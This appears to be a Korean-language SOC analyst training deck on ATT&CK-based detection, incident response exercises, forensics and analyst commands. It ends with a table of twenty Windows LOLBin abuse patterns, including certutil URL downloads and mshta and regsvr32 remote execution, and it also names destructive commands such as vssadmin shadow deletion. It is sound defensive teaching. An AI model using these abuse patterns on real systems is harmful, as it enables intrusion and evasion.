시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

타임라인 분석과 Dwell Time: 공격자가 얼마나 머물렀는가

탐지 시점 ≠ 공격 시작 시점 — 소급 분석으로 실제 Dwell Time을 계산해야 한다

타임라인 분석

Dwell Time 이해

Dwell Time 정의: 공격자가 첫 침투부터 탐지될 때까지 내부에 머문 기간
글로벌 평균 (Mandiant 2024): 약 10일 (개선 추세)
국내 현실: 수개월~1년 이상인 경우도 있음
왜 중요한가: Dwell Time이 길수록 피해 범위 확대, 자격증명 탈취 가능성 증가
MTTD와의 관계: MTTD 단축 = Dwell Time 감소 = 피해 최소화

공격 시작 시점 소급 방법

탐지 IOC(C2 도메인)로 DNS 로그 소급 검색 → 첫 쿼리 시점
탐지 프로세스의 생성 타임스탬프 확인
계정 비정상 활동의 가장 이른 시점
웹쉘 파일 생성 시각 (파일시스템 타임스탬프)

# Dwell Time 계산 예시 탐지 시점: 2024-11-20 14:32 DNS 소급 분석 결과: 첫 C2 쿼리: 2024-11-05 09:14 Dwell Time = 11월20일 - 11월5일 = 15일 → 15일 동안 탐지 안 됨! # 개선 목표: 신규 도메인 + Beaconing 룰 → MTTD 4시간 Dwell Time 15일 → 목표 1일 미만

✅ PIR 교훈 활용: Dwell Time이 길었던 원인 파악 (로그 없음? 룰 없음? 알람 놓침?) → Coverage 개선 우선순위에 직접 반영

보강 설명 Dwell Time은 공격자가 탐지되지 않고 내부에 머문 시간입니다. 타임라인 분석을 통해 공격 시작 시점을 소급해 파악하고 Dwell Time을 계산하는 방법을 다룹니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

Dwell Time체류 시간공격 시작 시점

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Dwell Time·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

사고 대응 롤플레이 시뮬레이션

실제 압박 상황에서의 의사결정 훈련 — 역할을 맡아 실시간으로 사고를 대응한다

IR 롤플레이

역할 배정 (팀당 3명)

🕵️ SOC 분석가 (Tier 2): 로그 분석, ATT&CK 매핑, 증거 수집
👩‍💼 IR 팀장: 봉쇄 결정, 팀 조율, 에스컬레이션 판단
👔 CISO/경영진: 비즈니스 영향 평가, 언론/규제 대응 결정

시나리오 시작 (새벽 3시)

EDR 경보: 핵심 금융 서버(FINSVR-01)에서 lsass.exe 메모리 접근 탐지.
10분 후: 보안 로그 삭제 이벤트.
동시에: 외부 통신 급증 알림.
내일 오전 9시 고객 배치 처리 예정 — 서버 격리 시 전면 중단.

실시간 의사결정 질문

T+0

분석가: 어떤 로그를 먼저 확인하고 무엇이 탐지 여부 판단에 결정적인가?

T+5

IR팀장: 서버를 지금 격리할 것인가? 추가 증거를 기다릴 것인가? 이유는?

T+10

CISO: 고객 배치 처리를 강행할 것인가 취소할 것인가? 무엇을 더 알아야 결정하는가?

T+20

팀 전체: 30초 경영진 보고 문장을 즉시 작성해 발표하라

보강 설명실제 사고 상황을 롤플레이로 체험하는 워크숍입니다. 수강생이 SOC 분석가, 사고 대응 팀장, CISO 역할을 맡아 실시간으로 사고를 대응하는 훈련입니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워…

IR 롤플레이역할 배정사고 대응 훈련

설명 확장

IR 롤플레이 기준으로 첫 단서를 먼저 분류하기
역할 배정를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

실전 케이스: 암호화폐 거래소 침해 분석

핫월렛 자격증명 탈취 → 대량 가상자산 이전 — Lazarus 유형 공격의 ATT&CK 체인

금융 사이버 보안

T1566.002 — LinkedIn 채용 제안 피싱

블록체인 개발자에게 채용 관련 PDF(악성 매크로) 전송. 높은 연봉 제안으로 클릭 유도

T1059 — 악성 코드 실행 후 환경 파악

개발자 PC 침해 → 거래소 내부 인프라, 핫월렛 시스템 접근 경로 파악

T1078.002 — 특권 계정 탈취 (Lateral Movement)

핫월렛 서명 권한을 가진 관리자 계정 자격증명 탈취. 다중 서명 체계 우회

T1657 — 금전 탈취 (Financial Theft)

핫월렛에서 공격자 지갑으로 대량 암호화폐 이전. 믹서 서비스로 추적 방해

암호화폐 거래소 특수 보안

콜드-핫 분리: 핫월렛에 최소 잔액 유지, 대부분 오프라인 콜드월렛
다중 서명(Multisig): 대형 출금 시 여러 키 필요 → 단일 계정 탈취로 이전 불가
시간 지연: 대형 출금에 24시간 지연 → 이상 탐지 시간 확보
인출 한도: 단기 출금 한도 설정 → 대량 이전 자동 차단

🚨 탐지 포인트:
비정상 시간 + 비정상 금액 + 처음 접근한 출금 주소 = 즉각 출금 보류. 블록체인 트랜잭션은 되돌릴 수 없으므로 탐지-차단이 유일한 방어

보강 설명 암호화폐 거래소를 대상으로 한 침해 시나리오입니다. Lazarus Group 유형의 공격으로 핫월렛 자격증명 탈취와 암호화폐 대량 이전을 분석합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1657암호화폐 거래소핫월렛

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1657 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

ATT&CK 기반 Tabletop Exercise (TTX) 기획

실제 시스템 없이 토론으로 — 의사결정·커뮤니케이션·절차를 훈련하는 가장 경제적인 방법

TTX 기획

TTX 기획 단계

목표 설정: 무엇을 테스트할 것인가? (의사결정 속도? 에스컬레이션? 대외 소통?)

시나리오 선택: ATT&CK 기반 현실적 시나리오. 업종·환경에 맞게 커스터마이즈

참가자 구성: SOC + IR + 경영진 + 법무 + PR — 다양한 역할 포함

인젝트(Inject) 설계: 시간별 새 정보 제공 → 의사결정 압박 유지

사후 검토(Debrief): 잘 된 것·개선점 도출 → 플레이북 즉시 업데이트

TTX 인젝트 예시 (랜섬웨어 시나리오)

시간	인젝트 (새 정보)	토론 질문
T+0	EDR: 3개 서버에서 파일 암호화 시작	격리 범위를 어디까지 결정하는가?
T+15	백업 서버도 암호화 중 확인	복구 계획을 어떻게 수정하는가?
T+30	공격자: 몸값 요구 + 데이터 유출 협박	협상할 것인가? 누가 결정하는가?
T+45	언론에서 취재 연락 옴	공시 의무? PR 대응 시점과 내용은?
T+60	규제기관에서 72시간 내 신고 요구	신고 범위와 내용을 어떻게 결정하는가?

보강 설명 Tabletop Exercise는 실제 사이버 사고 시나리오를 토론을 통해 연습하는 훈련입니다. 실제 시스템을 건드리지 않고 의사결정과 커뮤니케이션을 훈련합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

Tabletop ExerciseTTX토론 기반 훈련

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

메모리 포렌식과 ATT&CK: Volatility 기초

파일이 없어도 메모리에는 흔적이 있다 — 인젝션·C2·크리덴셜 흔적 추출

메모리 포렌식

메모리에서 찾을 수 있는 ATT&CK 증거

T1055 Process Injection: 프로세스 메모리에 인젝션된 악성 코드 페이지 (실행 권한 + 쓰기 권한 동시)
T1003 Credential Dumping: lsass.exe 메모리에 남은 자격증명 해시·평문
T1071 C2 통신: 소켓 정보, 네트워크 연결 상태
T1059 스크립트 실행: PowerShell/Python 스크립트 내용 (디스크에 없어도)
T1027 난독화: 복호화된 페이로드 (메모리에서 평문)

# Volatility 주요 플러그인 (ATT&CK 연계) # 프로세스 목록 (정상 vs 의심 비교) vol.py -f mem.dmp pslist vol.py -f mem.dmp pstree # 부모-자식 관계 # 인젝션된 DLL / 프로세스 확인 (T1055) vol.py -f mem.dmp malfind # 네트워크 연결 (C2 탐지) vol.py -f mem.dmp netscan # 커맨드 히스토리 (실행 명령) vol.py -f mem.dmp cmdline vol.py -f mem.dmp consoles

보강 설명 메모리 포렌식은 파일리스 공격과 인젝션 탐지에 필수적입니다. Volatility를 이용해 메모리에서 ATT&CK 증거를 추출하는 기초 방법을 소개합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

메모리 포렌식Volatility파일리스 공격

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

공격 시뮬레이션 결과 보고서 형식

Atomic Red Team 실행 결과를 Coverage 점수와 개선 계획으로 연결하는 보고서 형식

시뮬레이션 보고서

보고서 헤더
시뮬레이션 ID	SIM-2024-Q4-003
실행 일시	2024-11-25 14:00~17:00
범위	Windows 엔드포인트 10대, 도메인 컨트롤러 1대
대상 TTP	T1003.001, T1053.005, T1059.001 (3개)
실행 도구	Atomic Red Team v4.x

Technique	탐지	Coverage 전	Coverage 후	발견 사항
T1003.001	○	2	3	Sysmon 10 정상 발화
T1053.005	✗	1	1	4698 수집 확인, 룰 없음
T1059.001	△	2	2	-Enc 탐지 but -NoP 우회됨

발견 사항별 개선 권고

T1053.005 (미탐): EventID 4698 기반 탐지 룰 즉시 작성 필요. 예상 소요: 탐지팀 1일
T1059.001 (부분탐지): -NoP 우회 탐지 조건 추가. PowerShell 실행 정책 Constrained 검토
T1003.001 (탐지성공): Coverage 3 달성. 분기별 재검증 유지

✅ Coverage 점수 변화:
Before: T1003.001(2) + T1053.005(1) + T1059.001(2) = 5/9
After: T1003.001(3) + 나머지 개선 예정 → 목표 7/9

보강 설명 Atomic Red Team이나 CALDERA를 사용한 공격 시뮬레이션 결과를 어떻게 보고서로 작성하는지 다룹니다. 발견 사항, 탐지 여부, Coverage 업데이트, 개선 권고를… 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

시뮬레이션 결과 보고서Atomic Red Team 보고탐지 여부

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
시뮬레이션 결과 보고서·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

탐지 엔지니어(Detection Engineer): 역할과 스킬셋

SOC 분석가와 보안 엔지니어 사이의 전문가 — 공격을 알고 탐지를 설계한다

탐지 엔지니어 커리어

탐지 엔지니어 핵심 책임

ATT&CK 기반 탐지 룰 설계·개발·유지보수
SIEM 플랫폼 최적화 및 파서 개발
Coverage 분석 및 개선 로드맵 관리
Purple Team 기술 지원 및 검증
탐지 자동화 파이프라인 구축·운영
분석가 대상 탐지 내용 교육

필요 스킬셋

기술: SIEM 쿼리(Splunk/KQL), Python/PowerShell, Sigma, YARA
지식: ATT&CK 전반, 로그 분석, 공격 기법 이해
소프트: 분석가와의 협업, 문서화, 우선순위 판단

성숙한 SOC 팀 구조

SOC 관리자

Tier 1 분석가
(Triage)

Tier 2 분석가
(Deep Analysis)

Tier 3
(IR 전문가)

탐지 엔지니어
(룰 설계·자동화)

Threat Hunter
(능동 탐색)

💡 성장 경로: Tier 1 → Tier 2 → (Tier 3 또는 탐지 엔지니어 또는 Threat Hunter) — ATT&CK 역량이 모든 경로에서 핵심 자산

보강 설명탐지 엔지니어 역할의 책임 범위, 필요 스킬셋, 팀 내 협업 방식을 다룹니다. SOC 분석가가 탐지 엔지니어로 성장하는 경로와 필요한 역량을 설명합니다. 데이터 원천·오탐 구분·운영 액션까지 연결해야 실무 적용도가 높아…

탐지 엔지니어Detection Engineer역할 책임

설계 포인트

탐지 엔지니어에 필요한 Data Source를 먼저 정리하기
Detection Engineer를 어떤 조건으로 탐지할지 구체화하기
룰·대시보드·플레이북을 같은 언어로 정렬하기

튜닝 포인트

화이트리스트·시간대·자산 중요도 조건 추가
False Positive와 False Negative를 따로 점검
검증 결과를 Coverage 점수에 반영하기

운영 적용

분기별 ATT&CK 버전 업데이트를 체크리스트화
CTI·Purple Team 결과를 룰 개선 backlog로 연결
티켓 문장까지 동일한 ATT&CK 용어로 통일

NTFS 포렌식 아티팩트와 ATT&CK 증거 연결

파일이 삭제되어도 흔적은 남는다 — NTFS 아티팩트에서 공격 증거 추출

포렌식 심층

NTFS 아티팩트	위치	포렌식 가치	ATT&CK 관련
$MFT	볼륨 루트	모든 파일 메타데이터, 삭제 파일 흔적	T1070.004 파일 삭제 탐지
$USNJournal	$Extend	파일 생성·수정·삭제 변경 로그	T1505.003 WebShell 생성 시각
Prefetch	C:\Windows\Prefetch	실행된 프로그램 목록, 실행 횟수·시각	T1059 악성 프로세스 실행 이력
LNK 파일	최근 문서, 바탕화면	최근 접근 파일, 원본 경로·시각	T1566.001 첨부파일 열람 이력
$LogFile	볼륨 루트	NTFS 트랜잭션 로그, 복구 가능 데이터	삭제된 파일 복구
ADS (대체 데이터 스트림)	파일 속성	숨겨진 데이터, Zone.Identifier	T1564.004 ADS 악용 탐지

# Prefetch 분석 (Execution 증거) # C:\Windows\Prefetch 내 .pf 파일 MIMIKATZ.EXE-ABC12345.pf First Run: 2024-11-20 02:15:33 Run Count: 3 Last Run: 2024-11-20 02:18:44 # → Mimikatz 실행 이력 확인 (T1003.001) # 파일 삭제 후에도 .pf 파일 남아 있음

⚠️ 타임스탬프 조작 주의: T1070.006 Timestomping으로 파일 생성/수정 시각이 변조될 수 있음. $USNJournal과 교차 확인으로 진짜 시각 복원

보강 설명 NTFS 파일 시스템의 포렌식 아티팩트에서 ATT&CK 증거를 추출하는 방법입니다. $MFT, $USNJournal, Prefetch, LNK 파일 등의 아티팩트가 어떤… 시간 순서와 후속 조치를 같이 보면 공격 흐름이 더 또렷해집니다.

NTFS 포렌식MFTUSNJournal

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

복합 시나리오: 외부 공격자가 내부자처럼 행동

피싱으로 계정 탈취 → 정상 계정으로 내부 정찰 · 데이터 수집 — 가장 탐지 어려운 케이스

복합 시나리오

시나리오 특징과 탐지 도전

공격자 행동: 탈취한 계정으로 업무 시간에 정상적으로 로그인 → 정상 트래픽에 숨음
점진적 탐색: 하루 수 건의 정찰 명령 → 임계값 우회
정상 도구 사용: PowerShell, Excel, SharePoint 정상 기능으로 데이터 수집
탐지 어려운 이유: 시그니처 없음, 악성 파일 없음, 정상 계정 사용

탐지 가능 신호

사용자의 평소 접근 파일 유형 이탈 (HR → 기술 문서)
새벽 활동 (평소 사용자 패턴과 다름)
접속 위치 이상 (평소 서울 → 해외 IP)
대용량 파일 접근 집중 (하루 수 건 → 수백 건)

# UEBA 기반 이상 탐지 쿼리 # 사용자의 파일 접근 패턴 이탈 index=file_audit user = "lee.minjun" earliest=-1d | stats count by share_path | where share_path NOT IN [ # 해당 사용자 30일 평균 접근 경로 search index=file_audit user="lee.minjun" earliest=-30d latest=-1d | stats count by share_path | where count > 5 | return share_path]

✅ 탐지 접근: 단일 이벤트가 아닌 사용자 행동 기준선과의 비교가 핵심. UEBA 솔루션 또는 수동 기준선 쿼리 구축 필요

보강 설명 외부 피싱 공격과 내부자 위협이 결합된 복합 시나리오입니다. 외부 공격자가 내부 직원 계정을 탈취해 내부자처럼 행동하는 케이스는 탐지가 가장 어려운 유형입니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1078복합 시나리오외부+내부자

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1078 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

최종 종합 실습: 48시간 침해 사고 타임라인 재구성

가장 현실적인 SOC 업무 — 48시간 분량의 혼합 로그에서 전체 공격 체인을 완성하라

최종 종합 실습

제공 데이터 (가상)

Day 1 (11/25 09:00~24:00): 메일GW 로그 2,400건, EDR 이벤트 8,500건, DNS 쿼리 15,000건
Day 2 (11/26 00:00~09:00): Proxy 로그 3,200건, FW 연결 12,000건, WinEvent 4,100건
공격 관련 이벤트: 전체 로그 중 약 0.3%에 숨겨져 있음

실습 산출물 요구사항

전체 공격 타임라인 (시간순)
ATT&CK 매핑표 (전체 체인)
공격 시작 시점과 Dwell Time 계산
탐지 공백 3개 식별
30초 경영진 보고 문장
즉각 대응 권고 3가지

권장 검색 접근 전략

1단계: 외부 통신 이상 검색 (신규 도메인, 높은 VT 점수)
2단계: 의심 호스트 중심으로 모든 소스 교차 분석
3단계: 의심 계정 활동 전체 조회 (인증, 파일, 명령)
4단계: 첫 의심 이벤트 이전으로 소급해 시작 시점 찾기
5단계: 공격 체인 연결 → 보고서 작성

⏱️ 제한 시간: 45분
개인 또는 2인 팀 → 발표 5분
평가: 정확성 40% + 논리성 30% + 보고서 완성도 30%

보강 설명48시간에 걸친 실제형 침해 사고 데이터를 제공하고, 수강생이 전체 타임라인을 재구성하는 최종 종합 실습입니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

48시간 사고타임라인 재구성전체 분석

설명 확장

48시간 사고 기준으로 첫 단서를 먼저 분류하기
타임라인 재구성를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

인시던트 초기 10분 체크리스트 — 패닉 없이 구조적으로

경보 수신 후 처음 10분이 전체 대응 품질을 결정한다 — 이 체크리스트를 몸에 익혀라

인시던트 초기 대응

경보 내용 3줄 파악: 무엇이(What) · 어디서(Where) · 언제(When) — 5초 안에

위험도 초기 판단: 고위험 자산? 공격 진행 중? 업무 영향? — 30초

증거 보존 시작: 로그 백업, 메모리 덤프 필요 여부 — 즉시 결정

관련 로그 수집: 경보 발생 전후 30분 로그 수집 시작

ATT&CK 초기 매핑: Tactic + Technique 1~2개 추정 — 이후 업데이트

에스컬레이션 판단: 독립 처리? 시니어 호출? 즉시 결정

격리 여부 판단: 업무 영향 vs 위험 균형 — 결정 근거 기록

티켓 개설 + 초기 기록: 발견 시각·경보 내용·초기 판단 기록 — 타임라인 시작

10분 이내 즉각 격리 기준

lsass.exe 비정상 접근 확인 (T1003.001)
vssadmin delete shadows 실행 (T1490)
대량 파일 .enc 확장자 변경 (T1486)
EDR/보안 에이전트 강제 중지 (T1562.001)
DC에 대한 비정상 접근 시도 (T1003.006)

"패닉은 탐지보다 더 많은 피해를 만든다."
이 체크리스트를 따르면 압박 상황에서도 구조적으로 행동할 수 있다

보강 설명 경보를 받은 직후 10분 안에 해야 할 일을 명확히 정리한 체크리스트입니다. 이 지침을 체화하면 어떤 상황에서도 패닉 없이 구조적으로 대응할 수 있습니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

인시던트 초기 대응10분 체크리스트구조적 대응

이해 포인트

인시던트 초기 대응를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
10분 체크리스트 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

취약점 인텔리전스와 ATT&CK 연계

CVSS 점수만으로 패치 순서 결정하지 말라 — 실제 익스플로잇 여부와 ATT&CK 체인이 더 중요

취약점 인텔리전스

취약점 우선순위 결정 프레임워크

기준	낮음	높음
CVSS 점수	< 7.0	≥ 9.0 (Critical)
실제 익스플로잇 코드 공개	없음	PoC/Metasploit 모듈
실제 공격에서 사용	없음	CISA KEV 목록 포함
공격 체인 위치	사후 단계	Initial Access 가능
우리 환경 노출	내부망 전용	인터넷 노출 서비스

실무 패치 우선순위 원칙

CISA KEV 최우선: cisa.gov/known-exploited-vulnerabilities-catalog — 실제 공격에서 사용 확인된 CVE. 즉시 패치
Initial Access 취약점: T1190, T1133에 사용되는 CVE → 외부 노출 서비스 즉시 패치
CVSS 높지만 익스플로잇 없음: 중간 우선순위 — 정기 패치 주기에 포함
내부망 전용: Lateral Movement 시에만 영향 → 낮은 우선순위

⚠️ 패치 지연 위험: Log4Shell은 CVSS 10.0이었고 발표 후 수 시간 내 공격 시작. 인터넷 노출 Critical 취약점은 24시간 내 패치 목표

보강 설명 CVE 취약점 정보를 ATT&CK과 연결하는 방법입니다. CVSS 점수뿐 아니라 실제 익스플로잇 가능성과 우리 환경에서의 공격 체인을 분석해 패치 우선순위를 결정합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

취약점 인텔리전스CVE ATT&CKCVSS

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

치트시트 7: SOC 분석가 필수 커맨드 레퍼런스

인시던트 대응 시 바로 실행 가능한 분석 커맨드 — 외울 필요 없이 참조하는 카드

치트시트

## Windows 분석 필수 # 실행 중인 프로세스 + 네트워크 netstat -anob # 프로세스 트리 wmic process get name,processid,parentprocessid # 예약 작업 전체 schtasks /query /fo LIST /v # 서비스 목록 sc query type= all state= all # 최근 로그인 이벤트 wevtutil qe Security "/q:*[EventID=4624]" # 공유 폴더 net share # 자동 시작 목록 reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

## Linux 분석 필수 # 프로세스 + 네트워크 ps auxf ss -tulnp # 최근 로그인 last -20 lastb -20 # crontab 전수 확인 for u in $(cut -f1 -d: /etc/passwd); do crontab -l -u $u 2>/dev/null; done # SUID 파일 (권한 상승 벡터) find / -perm -4000 -type f 2>/dev/null # 최근 수정 파일 find /var/www -newer /etc/passwd -type f

## 네트워크 분석 필수 # 실시간 패킷 캡처 tcpdump -i eth0 -w capture.pcap host suspicious_ip # 포트 스캔 여부 확인 tcpdump -r capture.pcap 'tcp[tcpflags] == tcp-syn' # DNS 쿼리 실시간 tcpdump -i any port 53 -l # Wireshark 필터 (C2 탐지) http.request && !ip.dst == 내부IP # nmap (내부 포트 확인) nmap -sV -p 445,3389,22 10.0.0.0/24

보강 설명 SOC 분석 시 자주 사용하는 Windows/Linux 커맨드와 ATT&CK 탐지 관련 도구 커맨드를 모은 레퍼런스 카드입니다. 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

SOC 커맨드 레퍼런스Windows 분석 명령Linux 분석 명령

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
SOC 커맨드 레퍼런스·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

나만의 ATT&CK 학습 저널: 52주 성장 계획

매주 Technique 하나 — 52주 후 52개 Technique를 깊이 이해하는 분석가가 된다

지속 학습 계획

주간 학습 저널 형식

주차	Week ___
선택 Technique	T_______ _______________
ATT&CK 페이지 분석	Data Source: ___ Component: ___
실습 내용	Atomic Test #___ 실행 결과: ___
탐지 룰 작성	쿼리 작성 여부: ○/✗
실무 연결	우리 환경 적용 방법: ___
다음 주 예정	T_______

52주 추천 학습 순서

1~10주: 가장 자주 탐지되는 TOP 10 Technique (T1566, T1059, T1110 등)
11~20주: 탐지 공백 있는 Technique (T1558, T1055, T1574 등)
21~30주: 클라우드 Technique (T1078.004, T1530, T1537 등)
31~40주: Defense Evasion 집중 (T1562, T1027, T1070 계열)
41~52주: ICS, 취약한 기술, 새 업데이트 Technique

✅ 52주 후 기대 효과:
52개 Technique 심층 이해 + 탐지 룰 라이브러리 구축 + 실습 경험 누적 = 업계 상위 10% SOC 분석가 역량

보강 설명 수강 완료 후 지속적인 학습을 위한 저널 작성 방법입니다. 매주 하나의 Technique를 깊이 공부하고 실습해서 기록하는 방식으로 1년에 52개 Technique를 체화할 수 있습니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

ATT&CK 학습 저널주간 학습Technique 심층 연구

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
ATT&CK 학습 저널를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

LOLBin 완전 정리: 정상 도구 악용 패턴 20선

Windows 기본 도구 20개의 악용 패턴과 탐지 접근 — 실행 컨텍스트가 항상 탐지의 열쇠

LOLBin 종합

도구	악용 방법	ATT&CK	탐지 핵심
`certutil.exe`	URL 파일 다운로드	T1105	-urlcache + 외부 URL
`mshta.exe`	원격 HTA 실행	T1218.005	원격 URL 파라미터
`regsvr32.exe`	COM 스크립트 실행	T1218.010	/s /n /u /i 조합
`wmic.exe`	원격 프로세스 생성	T1047	process call create
`bitsadmin.exe`	BITS 파일 다운로드	T1197	/transfer + 외부 URL
`cmstp.exe`	UAC 우회 + 코드 실행	T1218.003	INF 파일 파라미터
`odbcconf.exe`	DLL 로드	T1218.008	/A {REGSVR ...}
`control.exe`	CPL 파일 실행	T1218.002	비표준 .cpl 파일
`installutil.exe`	.NET 어셈블리 실행	T1218.004	/LogToConsole=false
`msiexec.exe`	원격 MSI 실행	T1218.007	/quiet + 외부 URL

도구	악용 방법	ATT&CK	탐지 핵심
`runscripthelper.exe`	스크립트 실행 우회	T1218	비정상 부모 프로세스
`dnscmd.exe`	DNS 레코드 추가	T1584	DNS 설정 변경
`esentutl.exe`	파일 복사/추출	T1003	SAM/NTDS 접근
`expand.exe`	파일 압축 해제	T1105	비표준 경로 + 외부
`finger.exe`	데이터 다운로드	T1105	finger + 외부 IP
`ftp.exe`	파일 전송	T1041	외부 FTP 서버
`makecab.exe`	데이터 압축/스테이징	T1560	민감 파일 + makecab
`pcalua.exe`	프로세스 실행	T1218	-a 파라미터
`replace.exe`	파일 교체	T1574	시스템 파일 위치
`forfiles.exe`	명령 실행	T1218	/p /m /c 조합

보강 설명 LOLBin을 종합적으로 정리하는 슬라이드입니다. Windows 기본 도구들이 어떻게 악용되는지 패턴별로 분류하고, 각 도구의 탐지 접근법을 정리합니다. 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

T1218T1197T1127

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
